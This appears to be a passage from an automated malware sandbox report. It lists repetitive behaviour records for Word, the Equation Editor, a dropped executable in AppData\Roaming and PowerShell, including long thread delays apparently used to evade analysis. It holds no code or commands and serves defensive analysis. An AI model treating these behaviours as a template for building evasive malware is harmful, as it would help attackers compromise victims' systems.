Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 21E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 5B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 5850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 6B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 7B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 1B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 25E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Memory allocated: 1B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1779	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3707	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Window / User API: threadDelayed 9769	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Window / User API: foregroundWindowGot 1745	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3288	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3652	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3684	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3684	Thread sleep time: -5400000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3780	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
